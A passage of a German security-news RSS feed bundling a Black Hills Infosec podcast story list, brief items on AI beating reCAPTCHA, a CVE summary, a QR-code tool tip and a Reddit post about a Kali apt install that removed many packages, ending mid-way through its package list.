https://www.infosecurity-magazine.com/news/lazarus-developers-vmconnect/<br />
<br />
Story # 4: LinkedIn Addresses User Data Collection for AI Training<br />
https://www.darkreading.com/cyber-risk/linkedin-user-data-collection-ai-training<br />
<br />
Story # 5: Disney ditching Slack after massive July data breach<br />
https://www.bleepingcomputer.com/news/security/disney-ditching-slack-after-massive-july-data-breach/<br />
<br />
Story # 6: FTC exposes massive surveillance of kids, teens by social media giants<br />
https://www.bleepingcomputer.com/news/technology/ftc-exposes-massive-surveillance-of-kids-teens-by-social-media-giants/<br />
<br />
Story # 7: Kaspersky deletes itself, installs UltraAV antivirus without warning<br />
https://www.bleepingcomputer.com/news/security/kaspersky-deletes-itself-installs-ultraav-antivirus-without-warning/<br />
<br />
///Black Hills Infosec Socials<br />
Twitter: https://twitter.com/BHinfoSecurity<br />
Mastodon: https://infosec.exchange/@blackhillsinfosec<br />
LinkedIn: https://www.linkedin.com/company/antisyphon-training<br />
Discord: https://discord.gg/ffzdt3WUDe<br />
<br />
///Black Hills Infosec Shirts & Hoodies<br />
https://spearphish-general-store.myshopify.com/collections/bhis-shirt-collections<br />
<br />
///Black Hills Infosec Services<br />
Active SOC: https://www.blackhillsinfosec.com/services/active-soc/<br />
Penetration Testing: https://www.blackhillsinfosec.com/services/<br />
Incident Response: https://www.blackhillsinfosec.com/services/incident-response/<br />
<br />
///Backdoors & Breaches - Incident Response Card Game<br />
Backdoors & Breaches: https://www.backdoorsandbreaches.com/<br />
Play B&B Online: https://play.backdoorsandbreaches.com/<br />
<br />
///Antisyphon Training<br />
Pay What You Can: https://www.antisyphontraining.com/pay-what-you-can/<br />
Live Training: https://www.antisyphontraining.com/course-catalog/<br />
On Demand Training: https://www.antisyphontraining.com/on-demand-course-catalog/<br />
Antisyphon Discord: https://discord.gg/antisyphon<br />
Antisyphon Mastodon: https://infosec.exchange/@Antisy_Training<br />
<br />
///Educational Infosec Content<br />
Black Hills Infosec Blogs: https://www.blackhillsinfosec.com/blog/<br />
Wild West Hackin' Fest YouTube: https://www.youtube.com/wildwesthackinfest<br />
Antisyphon Training YouTube: https://www.youtube.com/antisyphontraining<br />
Active Countermeasures YouTube: https://youtube.com/activecountermeasures<br />
Threat Hunter Community Discord: https://discord.gg/threathunter<br />
<br />
Join us at the annual information security conference in Deadwood, SD (in-person and virtually) — Wild West Hackin' Fest: https://wildwesthackinfest.com/<br />
<br />
<br />
#infosecnews #cybersecurity #podcast  #podcastclips<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[REKAST - Talkin' Bout [infosec] News 2024-09-23 #infosecnews #cybersecurity #podcast  #podcastclips]]></title>
<description><![CDATA[Author: Black Hills Information Security - Bewertung: 0x - Views:5 Join us LIVE on Mondays, 4:430pm EST.
Here's a byte-sized highlight reel of our weekly Podcast with BHIS and Friends. stories. (https://blubrry.com/bhis/) We discuss notable Infosec, and infosec-adjacent news stories. 

Chat with ...]]></description>
<link>https://tsecurity.de/de/2356939/it-security-video/rekast-talkin-bout-infosec-news-2024-09-23-infosecnews-cybersecurity-podcast-podcastclips/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2356939/it-security-video/rekast-talkin-bout-infosec-news-2024-09-23-infosecnews-cybersecurity-podcast-podcastclips/</guid>
<pubDate>Sat, 28 Sep 2024 07:04:16 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<enclosure url="https://i.ytimg.com/vi/emVp5qN0xgk/maxresdefault.jpg" length="0" type="image/jpeg" />
<content:encoded><![CDATA[<p>Author: Black Hills Information Security - Bewertung: 0x - Views:5 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/emVp5qN0xgk?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Join us LIVE on Mondays, 4:430pm EST.<br />
Here's a byte-sized highlight reel of our weekly Podcast with BHIS and Friends. stories. (https://blubrry.com/bhis/) We discuss notable Infosec, and infosec-adjacent news stories. <br />
<br />
Chat with us on Discord! - <br />
https://discord.gg/bhis<br />
🔴webcast-live-chat<br />
<br />
Brought to you by: <br />
📄 Antisyphon Training<br />
https://www.antisyphontraining.com/<br />
<br />
▶️ This FULL EPISODE:<br />
https://youtube.com/live/_sCeVWOOt9A<br />
▶️ The next EPISODE:<br />
https://youtube.com/live/C2M1uKNmpFc<br />
<br />
🔗 Register for webcasts, summits, and workshops - <br />
https://poweredbybhis.com<br />
<br />
/// All News Stories From the Full Episode<br />
Story # 1: Pagers attack brings to life long-feared supply chain threat<br />
https://www.washingtonpost.com/technology/2024/09/19/hezbollah-pager-attack-supply-chain/<br />
<br />
Story # 2: Recaptcha Phish - John Hammond<br />
https://x.com/_JohnHammond/status/1834552797733274049<br />
https://github.com/JohnHammond/recaptcha-phish<br />
https://x.com/_JohnHammond/status/1836484080504049692<br />
<br />
Story # 2b: Clever ‘GitHub Scanner’ campaign abusing repos to push malware<br />
https://www.bleepingcomputer.com/news/security/clever-github-scanner-campaign-abusing-repos-to-push-malware/<br />
<br />
Story # 3: Lazarus Group Targets Developers in Fresh VMConnect Campaign<br />
https://www.infosecurity-magazine.com/news/lazarus-developers-vmconnect/<br />
<br />
Story # 4: LinkedIn Addresses User Data Collection for AI Training<br />
https://www.darkreading.com/cyber-risk/linkedin-user-data-collection-ai-training<br />
<br />
Story # 5: Disney ditching Slack after massive July data breach<br />
https://www.bleepingcomputer.com/news/security/disney-ditching-slack-after-massive-july-data-breach/<br />
<br />
Story # 6: FTC exposes massive surveillance of kids, teens by social media giants<br />
https://www.bleepingcomputer.com/news/technology/ftc-exposes-massive-surveillance-of-kids-teens-by-social-media-giants/<br />
<br />
Story # 7: Kaspersky deletes itself, installs UltraAV antivirus without warning<br />
https://www.bleepingcomputer.com/news/security/kaspersky-deletes-itself-installs-ultraav-antivirus-without-warning/<br />
<br />
///Black Hills Infosec Socials<br />
Twitter: https://twitter.com/BHinfoSecurity<br />
Mastodon: https://infosec.exchange/@blackhillsinfosec<br />
LinkedIn: https://www.linkedin.com/company/antisyphon-training<br />
Discord: https://discord.gg/ffzdt3WUDe<br />
<br />
///Black Hills Infosec Shirts & Hoodies<br />
https://spearphish-general-store.myshopify.com/collections/bhis-shirt-collections<br />
<br />
///Black Hills Infosec Services<br />
Active SOC: https://www.blackhillsinfosec.com/services/active-soc/<br />
Penetration Testing: https://www.blackhillsinfosec.com/services/<br />
Incident Response: https://www.blackhillsinfosec.com/services/incident-response/<br />
<br />
///Backdoors & Breaches - Incident Response Card Game<br />
Backdoors & Breaches: https://www.backdoorsandbreaches.com/<br />
Play B&B Online: https://play.backdoorsandbreaches.com/<br />
<br />
///Antisyphon Training<br />
Pay What You Can: https://www.antisyphontraining.com/pay-what-you-can/<br />
Live Training: https://www.antisyphontraining.com/course-catalog/<br />
On Demand Training: https://www.antisyphontraining.com/on-demand-course-catalog/<br />
Antisyphon Discord: https://discord.gg/antisyphon<br />
Antisyphon Mastodon: https://infosec.exchange/@Antisy_Training<br />
<br />
///Educational Infosec Content<br />
Black Hills Infosec Blogs: https://www.blackhillsinfosec.com/blog/<br />
Wild West Hackin' Fest YouTube: https://www.youtube.com/wildwesthackinfest<br />
Antisyphon Training YouTube: https://www.youtube.com/antisyphontraining<br />
Active Countermeasures YouTube: https://youtube.com/activecountermeasures<br />
Threat Hunter Community Discord: https://discord.gg/threathunter<br />
<br />
Join us at the annual information security conference in Deadwood, SD (in-person and virtually) — Wild West Hackin' Fest: https://wildwesthackinfest.com/<br />
<br />
<br />
#infosecnews #cybersecurity #podcast  #podcastclips<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Yolo: Forscher lösen reCaptcha-Tests mit künstlicher Intelligenz]]></title>
<description><![CDATA[Die KI besteht die Tests zu 100 Prozent. Die Forscher trainieren das Yolo genannte KI-Modell lediglich mit den üblicherweise bei reCaptcha-Tests gezeigten Bildern.]]></description>
<link>https://tsecurity.de/de/2355984/it-nachrichten/yolo-forscher-loesen-recaptcha-tests-mit-kuenstlicher-intelligenz/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2355984/it-nachrichten/yolo-forscher-loesen-recaptcha-tests-mit-kuenstlicher-intelligenz/</guid>
<pubDate>Fri, 27 Sep 2024 16:00:48 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die KI besteht die Tests zu 100 Prozent. Die Forscher trainieren das Yolo genannte KI-Modell lediglich mit den üblicherweise bei reCaptcha-Tests gezeigten Bildern.]]></content:encoded>
</item>
<item>
<title><![CDATA[KI durchbricht Sicherheitsbarrieren: Nervige Captchas bald kein Hindernis mehr?]]></title>
<description><![CDATA[Einer KI ist es gelungen, das reCAPTCHA v2-System zu überwinden – eines der am häufigsten verwendeten Captchas, das bisher als zuverlässige Methode galt, um Menschen von Bots zu unterscheiden. Unabhängig und kostenlos dank Ihres Klicks.]]></description>
<link>https://tsecurity.de/de/2353258/it-nachrichten/ki-durchbricht-sicherheitsbarrieren-nervige-captchas-bald-kein-hindernis-mehr/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2353258/it-nachrichten/ki-durchbricht-sicherheitsbarrieren-nervige-captchas-bald-kein-hindernis-mehr/</guid>
<pubDate>Thu, 26 Sep 2024 09:45:44 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Einer KI ist es gelungen, das reCAPTCHA v2-System zu überwinden – eines der am häufigsten verwendeten Captchas, das bisher als zuverlässige Methode galt, um Menschen von Bots zu unterscheiden. Unabhängig und kostenlos dank Ihres Klicks.]]></content:encoded>
</item>
<item>
<title><![CDATA[KI durchbricht Sicherheitsbarrieren: Nervige Captchas bald kein Hindernis mehr?]]></title>
<description><![CDATA[Einer KI ist es gelungen, das reCAPTCHA v2-System zu überwinden – eines der am häufigsten verwendeten Captchas, das bisher als zuverlässige Methode galt, um Menschen von Bots zu unterscheiden.]]></description>
<link>https://tsecurity.de/de/2353149/it-nachrichten/ki-durchbricht-sicherheitsbarrieren-nervige-captchas-bald-kein-hindernis-mehr/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2353149/it-nachrichten/ki-durchbricht-sicherheitsbarrieren-nervige-captchas-bald-kein-hindernis-mehr/</guid>
<pubDate>Thu, 26 Sep 2024 08:45:38 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img align="right" alt="" width="60" height="34" src="https://im.chip.de/ii/1/2/6/9/8/6/9/0/1/Captchas_Bildaufgabe_75542292-3453199e05df8b4d.jpg?im=AspectCrop%2Csize%3D%2830%2C+17%29%2Cgravity%3DCenter%2CallowExpansion%3BResize%3D%2860%2C+34%29%2Caspect%3Dfit%3BBackgroundColor%2Ccolor%3Dffffff&amp;hash=7dfd17c9c3052fbf6072e12a67c3018147d2b98f367a3b84d9400890203a4302"> Einer KI ist es gelungen, das reCAPTCHA v2-System zu überwinden – eines der am häufigsten verwendeten Captchas, das bisher als zuverlässige Methode galt, um Menschen von Bots zu unterscheiden.]]></content:encoded>
</item>
<item>
<title><![CDATA[AI can now solve reCAPTCHA tests as accurately as you can]]></title>
<description><![CDATA[AI doesn't get every test right, but it's good enough to look convincingly human. Security pros say AI's progress is no big deal. Here's why.]]></description>
<link>https://tsecurity.de/de/2350684/it-nachrichten/ai-can-now-solve-recaptcha-tests-as-accurately-as-you-can/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2350684/it-nachrichten/ai-can-now-solve-recaptcha-tests-as-accurately-as-you-can/</guid>
<pubDate>Tue, 24 Sep 2024 22:00:38 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[AI doesn't get every test right, but it's good enough to look convincingly human. Security pros say AI's progress is no big deal. Here's why.]]></content:encoded>
</item>
<item>
<title><![CDATA[Informationen in QR-Form gießen]]></title>
<description><![CDATA[Informationen in QR-Form gießen

      
      
        
          
            
                

            
          
        
              
    
  Lars Nitsch
Fr., 02.08.2024 - 07:26

            QR-Codes sind sowohl bei Smartphone- als auch bei PC-Nutzern mittlerweile weit verbreitet. Bish...]]></description>
<link>https://tsecurity.de/de/2258345/server/informationen-in-qr-form-giessen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2258345/server/informationen-in-qr-form-giessen/</guid>
<pubDate>Fri, 02 Aug 2024 08:21:26 +0200</pubDate>
<category>🐧 Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<span class="field field--name-title field--type-string field--label-hidden">Informationen in QR-Form gießen</span>

      <div class="field field--name-field-image field--type-image field--label-hidden field__items">
      <div class="images-container clearfix">
        <div class="image-preview clearfix">
          <div class="image-wrapper clearfix">
            <div class="field__item">
                <a class="image-popup overlayed" href="https://www.it-administrator.de/QR-Codes-erstellen-mit-QRCodeMonkey"><img loading="lazy" src="https://www.it-administrator.de/sites/default/files/styles/medium/public/qrcode.jpg?itok=rTb3CfcN" width="480" height="319" alt="Langweilige, schwarzweiße QR-Codes gehören mit " qrcodemonkey der vergangenheit an. title="Langweilige, schwarzweiße QR-Codes gehören mit " typeof="foaf:Image" class="image-style-medium"><span class="overlay"><i class="fa fa-plus"></i></span></a>

            </div>
          </div>
        </div>
              </div>
    </div>
  <span class="field field--name-uid field--type-entity-reference field--label-hidden"><a title="Benutzerprofil anzeigen." href="https://www.it-administrator.de/user/109" lang="" about="https://www.it-administrator.de/user/109" typeof="schema:Person" property="schema:name" datatype="" class="username" xml:lang="">Lars Nitsch</a></span>
<span class="field field--name-created field--type-created field--label-hidden">Fr., 02.08.2024 - 07:26</span>

            <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item">QR-Codes sind sowohl bei Smartphone- als auch bei PC-Nutzern mittlerweile weit verbreitet. Bisher eher langweilig in ihrer Struktur, können Sie jetzt mit der Webseite "QRCodeMonkey" unzählig viele Formen und Farben ausprobieren. Somit lässt sich die Zusammensetzung der enthaltenen Informationen ganz besonders personalisieren.</div>
      <div class="field field--name-field-mt-post-categories field--type-entity-reference field--label-hidden field--entity-reference-target-type-taxonomy-term clearfix">
    <ul class="links field__items"><li><a href="https://www.it-administrator.de/tips-tools" hreflang="en">Tipps &amp; Tools</a></li>
      </ul></div>  <div class="node__links">
    <ul class="links inline"><li class="node-readmore"><a href="https://www.it-administrator.de/QR-Codes-erstellen-mit-QRCodeMonkey" rel="tag" title="Informationen in QR-Form gießen" hreflang="en">Weiterlesen<span class="visually-hidden"> über Informationen in QR-Form gießen</span></a></li></ul></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Forget security – Google's reCAPTCHA v2 is exploiting users for profit]]></title>
<description><![CDATA[Web puzzles don't protect against bots, but humans have spent 819 million unpaid hours solving them Google promotes its reCAPTCHA service as a security mechanism for websites, but researchers affiliated with the University of California, Irvine, argue it's harvesting information while extracting ...]]></description>
<link>https://tsecurity.de/de/2242603/it-security-nachrichten/forget-security-googles-recaptcha-v2-is-exploiting-users-for-profit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2242603/it-security-nachrichten/forget-security-googles-recaptcha-v2-is-exploiting-users-for-profit/</guid>
<pubDate>Wed, 24 Jul 2024 08:49:34 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4>Web puzzles don't protect against bots, but humans have spent 819 million unpaid hours solving them</h4> <p>Google promotes its reCAPTCHA service as a security mechanism for websites, but researchers affiliated with the University of California, Irvine, argue it's harvesting information while extracting human labor worth billions.…</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-5541 | Ibtana Plugin up to 1.2.3.3 on WordPress reCAPTCHA Settings improper authentication]]></title>
<description><![CDATA[A vulnerability was found in Ibtana Plugin up to 1.2.3.3 on WordPress and classified as critical. Affected by this issue is some unknown functionality of the component reCAPTCHA Settings. The manipulation leads to improper authentication.

This vulnerability is handled as CVE-2024-5541. The attac...]]></description>
<link>https://tsecurity.de/de/2187729/sicherheitsluecken/cve-2024-5541-ibtana-plugin-up-to-1233-on-wordpress-recaptcha-settings-improper-authentication/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2187729/sicherheitsluecken/cve-2024-5541-ibtana-plugin-up-to-1233-on-wordpress-recaptcha-settings-improper-authentication/</guid>
<pubDate>Wed, 19 Jun 2024 04:05:19 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/?product.ibtana_plugin">Ibtana Plugin up to 1.2.3.3</a> on WordPress and classified as <a href="https://vuldb.com/?kb.risk">critical</a>. Affected by this issue is some unknown functionality of the component <em>reCAPTCHA Settings</em>. The manipulation leads to improper authentication.

This vulnerability is handled as <a href="https://vuldb.com/?source_cve.268808">CVE-2024-5541</a>. The attack can only be done within the local network. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Keepassxc deleting dependencies making my Debian no longer functional]]></title>
<description><![CDATA[I am on virtual Machine with Kali. I did sudo apt update then sudo apt install keepassxc. I waited for the installation to finish, I noticed a weird pop up. I answered yes Then I answered yes. During installation I got some messages like Removing default-mysql-server (1.1.0) ... Removing dirb (2....]]></description>
<link>https://tsecurity.de/de/2175356/linux-tipps/keepassxc-deleting-dependencies-making-my-debian-no-longer-functional/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2175356/linux-tipps/keepassxc-deleting-dependencies-making-my-debian-no-longer-functional/</guid>
<pubDate>Tue, 11 Jun 2024 10:46:28 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I am on virtual Machine with Kali. I did sudo apt update then sudo apt install keepassxc. I waited for the installation to finish, I noticed a weird pop up.</p> <p><a href="https://preview.redd.it/dvgx0q7z7x5d1.png?width=2513&amp;format=png&amp;auto=webp&amp;s=0ae7ff1ba78f8e448c5cae3bad47d6e1c08fbad0">I answered yes</a></p> <p>Then I answered yes. During installation I got some messages like</p> <pre><code>Removing default-mysql-server (1.1.0) ... Removing dirb (2.22+dfsg-5) ... Removing dotnet-runtime-6.0 (6.0.8-1) ... Removing dotnet-runtime-deps-6.0 (6.0.9-1) ... Removing dsniff (2.4b1+debian-31) ... Removing dvisvgm (3.2+ds-1) ... Removing engrampa (1.26.2-3) ... Removing enum4linux (0.9.1-0kali1) ... Removing ettercap-graphical (1:0.8.3.1-13) ... Removing ettercap-common (1:0.8.3.1-13) ... Removing evil-winrm (3.5-0kali1) ... Removing thunar-archive-plugin:amd64 (0.5.2-1+b1) ... Removing xfce4-places-plugin:amd64 (1.8.3-1+b1) ... Removing kali-undercover (2023.4.1) ... Removing xfce4 (4.18) ... Removing xfdesktop4 (4.18.1-1) ... Removing faraday-cli (2.1.8-0kali1) ... Removing faraday (5.1.1-0kali4) ... Removing faraday-agent-dispatcher (3.2.1-0kali2) ... Removing fern-wifi-cracker (3.4-0kali1) ... Removing kali-desktop-core (2024.1.1) ... Removing firefox-esr (115.7.0esr-1) ... Removing 'diversion of /usr/bin/firefox to /usr/bin/firefox.real by firefox-esr' Removing freerdp2-x11 (2.11.2+dfsg1-1+b1) ... Removing gnome-keyring (42.1-1+b2) ... Removing pinentry-gnome3 (1.2.1-3) ... </code></pre> <p>I am not sure it is deleting old stuff or just wiping my system.</p> <p>When installation is finished, I reboot, and I get a minimalistic shell. No more UI, no more nothing ...</p> <p>Can someone give ideas why this epic fail is happening ?</p> <p>PS: When I did sudo apt insall keepassxc I got:</p> <pre><code>&gt; sudo apt install keepassxc Reading package lists... Done Building dependency tree... Done Reading state information... Done The following packages were automatically installed and are no longer required: accountsservice acl adwaita-icon-theme apache2-data apache2-utils aspell aspell-en aspnetcore-targeting-pack-6.0 at-spi2-common at-spi2-core atril-common attr avahi-daemon base58 binutils-mingw-w64-i686 binutils-mingw-w64-x86-64 bluez-obexd bubblewrap ca-certificates-java cli-common colord-data cracklib-runtime dcraw debugedit dictionaries-common dnsmap dnsmasq-base doc-base docbook-xml dotnet-apphost-pack-6.0 dotnet-host dotnet-hostfxr-6.0 dotnet-targeting-pack-6.0 emacsen-common enchant-2 engrampa-common espeak-ng-data fastjar figlet finger firebird3.0-common firebird3.0-common-doc flac fonts-dejavu fonts-dejavu-extra fonts-mathjax freetds-common g++-mingw-w64 g++-mingw-w64-i686 g++-mingw-w64-i686-posix g++-mingw-w64-i686-win32 g++-mingw-w64-x86-64 g++-mingw-w64-x86-64-posix g++-mingw-w64-x86-64-win32 galera-4 gcc-mingw-w64 gcc-mingw-w64-base gcc-mingw-w64-i686 gcc-mingw-w64-i686-posix gcc-mingw-w64-i686-posix-runtime gcc-mingw-w64-i686-win32 gcc-mingw-w64-i686-win32-runtime gcc-mingw-w64-x86-64 gcc-mingw-w64-x86-64-posix gcc-mingw-w64-x86-64-posix-runtime gcc-mingw-w64-x86-64-win32 gcc-mingw-w64-x86-64-win32-runtime gdal-data gdal-plugins gir1.2-atk-1.0 gir1.2-atspi-2.0 gir1.2-freedesktop gir1.2-gdkpixbuf-2.0 gir1.2-gstreamer-1.0 gir1.2-harfbuzz-0.0 gir1.2-nm-1.0 gir1.2-pango-1.0 gir1.2-xfconf-0 git-man glib-networking glib-networking-common glib-networking-services gnome-accessibility-themes gnome-icon-theme gnome-keyring-pkcs11 gnome-themes-extra gnome-themes-extra-data go-l2tp gparted-common greenbone-feed-sync gstreamer1.0-gl gstreamer1.0-plugins-base gstreamer1.0-x gtk-update-icon-cache gvmd-common hicolor-icon-theme hunspell-en-us i965-va-driver i965-va-driver:i386 ibverbs-providers icu-devtools iio-sensor-proxy imagemagick imagemagick-6-common imagemagick-6.q16 intel-media-va-driver intel-media-va-driver:i386 ipp-usb jarwrapper java-common java-wrappers ldap-utils libaa1 libabsl20220623 libaccountsservice0 libaec0 libaio1 libao-common libao4 libapr1 libaprutil1 libaprutil1-dbd-sqlite3 libaprutil1-ldap libarchive13 libarmadillo12 libarpack2t64 libaspell15 libass9 libasyncns0 libatk-adaptor libatk-bridge2.0-0t64 libatk-wrapper-java libatk-wrapper-java-jni libatk1.0-0t64 libatkmm-1.6-1v5 libatomic1:i386 libatspi2.0-0t64 libaudio2 libavahi-client3 libavahi-client3:i386 libavahi-common-data libavahi-common-data:i386 libavahi-common3 libavahi-common3:i386 libavahi-core7 libavahi-glib1 libavc1394-0 libavtp0 libavutil58 libavutil58:i386 libbcg729-0 libbfio1 libblosc1 libbluetooth3 libboost-dev libboost-iostreams1.74.0 libboost-thread1.74.0 libboost1.83-dev libbrlapi0.8 libbs2b0 libbson-1.0-0 libcaca0 libcairo-gobject2:i386 libcairo-script-interpreter2 libcairomm-1.0-1v5 libcapi20-3t64 libcdio-cdda2 libcdio-paranoia2 libcdio19 libcdparanoia0 libcephfs2 libcharon-extauth-plugins libchromaprint1 libcjson1 libcloudproviders0 libcloudproviders0:i386 libcodec2-1.2 libcodec2-1.2:i386 libcolord2 libcolord2:i386 libcolorhug2 libconfig++9v5 libconfig-inifiles-perl libcrack2 libdaemon0 libdatrie1:i386 libdaxctl1 libdbd-mariadb-perl libdbi-perl libdbus-glib-1-2 libdbusmenu-glib4 libdbusmenu-gtk3-4 libdc1394-25 libdca0 libdecor-0-0 libdirectfb-1.7-7 libdjvulibre-text libdjvulibre21 libdlt2 libdotconf0 libdv4 libdvdnav4 libdvdread8 libdw1t64 libegl-dev libenchant-2-2 libepoxy0:i386 liberror-perl libev4 libexif12 libexo-common libexpat1-dev libfaad2 libfbclient2 libffado2 libffi-dev libfftw3-double3 libfftw3-single3 libflac12 libfmt9 libfreeaptx0 libfreexl1 libfribidi0:i386 libfstrm0 libfsverity0 libfuse2 libfyba0 libgarcon-1-0 libgarcon-common libgdata-common libgdk-pixbuf-2.0-0:i386 libgeos-c1v5 libgeos3.12.1 libgif7 libgl-dev libgl1-mesa-dev libgles-dev libgles1 libgles2 libglibmm-2.4-1v5 libglu1-mesa libglu1-mesa-dev libglusterfs0 libglut-dev libglut3.12 libglvnd-core-dev libglvnd-dev libglx-dev libgme0 libgoa-1.0-0b libgoa-1.0-common libgomp1:i386 libgphoto2-port12 libgraphene-1.0-0 libgraphite2-3:i386 libgs-common libgs10-common libgsm1 libgsm1:i386 libgspell-1-common libgstreamer-gl1.0-0 libgstreamer-plugins-base1.0-0 libgstreamer1.0-0 libgtk-3-common libgtk-4-common libgtk2.0-common libgtksourceview-3.0-common libgtksourceview-4-common libgtop-2.0-11 libgtop2-common libgumbo2 libgusb2 libgxps2 libharfbuzz-gobject0 libharfbuzz-icu0 libharfbuzz0b:i386 libhashkit2 libhdf4-0-alt libhiredis1.1.0 libhtml-template-perl libhunspell-1.7-0 libhwy1 libhwy1:i386 libhyphen0 libibverbs1 libical3 libice-dev libicu-dev libiec61883-0 libieee1284-3 libigdgmm12 libigdgmm12:i386 libijs-0.35 libimath-3-1-29 libimobiledevice6 libinstpatch-1.0-2 libjack-jackd2-0 libjack-jackd2-0:i386 libjavascriptcoregtk-4.1-0 libjbig2dec0 libjemalloc2 libjim0.82 libjpeg-turbo-progs libjs-mathjax libjson-glib-1.0-0 libjson-glib-1.0-common libjudydebian1 libjxl0.7 libjxl0.7:i386 libjxr-tools libjxr0 libkate1 libkmlbase1 libkmldom1 libkmlengine1 liblc3-1 liblcms2-2:i386 libldacbt-abr2 libldacbt-enc2 libldb2 liblightdm-gobject-1-0 liblilv-0-0 liblmdb0 liblouis-data liblouis20 liblqr-1-0 libltc11 liblua5.2-0 libluajit-5.1-2 libluajit-5.1-common liblzf1 libmagickcore-6.q16-7 libmagickcore-6.q16-7-extra libmagickwand-6.q16-7 libmanette-0.2-0 libmariadb3 libmaxminddb0 libmbedcrypto7 libmbim-glib4 libmbim-proxy libmbim-utils libmemcached11 libmfx1 libmjpegutils-2.1-0 libmm-glib0 libmodplug1 libmongoc-1.0-0 libmongocrypt0 libmono-btls-interface4.0-cil libmono-corlib4.5-dll libmono-security4.0-cil libmono-system-configuration4.0-cil libmono-system-core4.0-cil libmono-system-numerics4.0-cil libmono-system-security4.0-cil libmono-system-xml4.0-cil libmono-system4.0-cil libmosquitto1 libmotif-common libmp3lame0 libmpcdec6 libmpeg2encpp-2.1-0 libmpg123-0 libmplex2-2.1-0 libmtp-common libmtp-runtime libmtp9 libmujs3 libmysofa1 libncurses-dev libndctl6 libndp0 libnetpbm11 libnfs14 libnfsidmap1 libnghttp2-14 libnghttp3-3 libnids1.21 libnma-common libnorm1 libnss-mdns libodbc2 libodbcinst2 libogg0 liboobs-1-5 libopenal-data libopenblas-dev libopenblas-pthread-dev libopenblas0 libopencore-amrnb0 libopenexr-3-1-30 libopenfec1 libopengl-dev libopenh264-7 libopenjp2-7:i386 libopenmpt0 libopenni2-0 libopus0 libopusfile0 liborc-0.4-0t64 libosmesa6 libout123-0 libpaho-mqtt1.3 libpam-gnome-keyring libpango-1.0-0:i386 libpangocairo-1.0-0:i386 libpangoft2-1.0-0:i386 libpangomm-1.4-1v5 libpangoxft-1.0-0 libparted-fs-resize0 libpfm4 libpgm-5.3-0 libpipewire-0.3-common libpkgconf3 libplacebo338 libplist3 libpmem1 libpocketsphinx3 libpoppler-glib8 libpoppler126 libpostproc57 libproxy1v5 libpskc0 libpthread-stubs0-dev libpulse-mainloop-glib0 libpulse0 libpulsedsp libpwquality-common libpwquality1 libpython3.12 libpython3.12-dev libqmi-glib5 libqmi-proxy libqmi-utils libqrtr-glib0 libqscintilla2-qt5-l10n libqt5designer5 libqt5help5 libqt5opengl5 libqt5positioning5 libqt5sensors5 libqt5sql5-sqlite libqt5sql5t64 libqt5test5 libqt5webchannel5 libqt5xml5 libqt6core5compat6 libqt6opengl6 libqt6openglwidgets6 libqt6sql6 libqt6sql6-sqlite libqt6test6 libqt6waylandclient6 libqt6waylandeglclienthwintegration6 libqt6wlshellintegration6 libqt6xml6 librabbitmq4 libradcli4 librados2 libraw1394-11 libraw23 librdmacm1 librist4 libroc0.3 librpm9 librpmbuild9 librpmio9 librpmsign9 librsvg2-2:i386 librsvg2-common:i386 librtmp1 librttopo1 librubberband2 libsamplerate0 libsane-common libsbc1 libserd-0-0 libshine3 libshine3:i386 libshout3 libsigc++-2.0-0v5 libsm-dev libsmi2ldbl libsnappy1v5 libsnappy1v5:i386 libsndfile1 libsonic0 libsord-0-0 libsoundtouch1 libsoup-3.0-common libsoup2.4-common libsoxr0 libsoxr0:i386 libspandsp2 libspeechd2 libspeex1 libspeex1:i386 libspeexdsp1 libspeexdsp1:i386 libsphinxbase3t64 libsratom-0-0 libsrt1.5-gnutls libsrtp2-1 libstartup-notification0 libstemmer0d libstoken1 libstrongswan libstrongswan-standard-plugins libsuperlu6 libsvtav1enc1d1:i386 libswresample4 libswresample4:i386 libswscale7 libsyn123-0 libsz2 libtag1v5 libtag1v5-vanilla libtagc0 libtalloc2 libtdb1 libteamdctl0 libterm-readkey-perl libtevent0 libthai0:i386 libtheora0 libtomcrypt1 libtommath1 libtss2-tcti-libtpms0 libtss2-tcti-spi-helper0 libtss2-tctildr0 libtumbler-1-0 libturbojpeg0 libtwolame0 libtwolame0:i386 libunibreak5 libupower-glib3 liburiparser1 libusbmuxd6 libuuid-perl libv4l-0 libv4lconvert0 libva-drm2 libva-drm2:i386 libva-x11-2 libva-x11-2:i386 libva2 libva2:i386 libvdpau-va-gl1 libvdpau-va-gl1:i386 libvdpau1 libvdpau1:i386 libvhdi1 libvidstab1.1 libvisual-0.4-0 libvmdk1 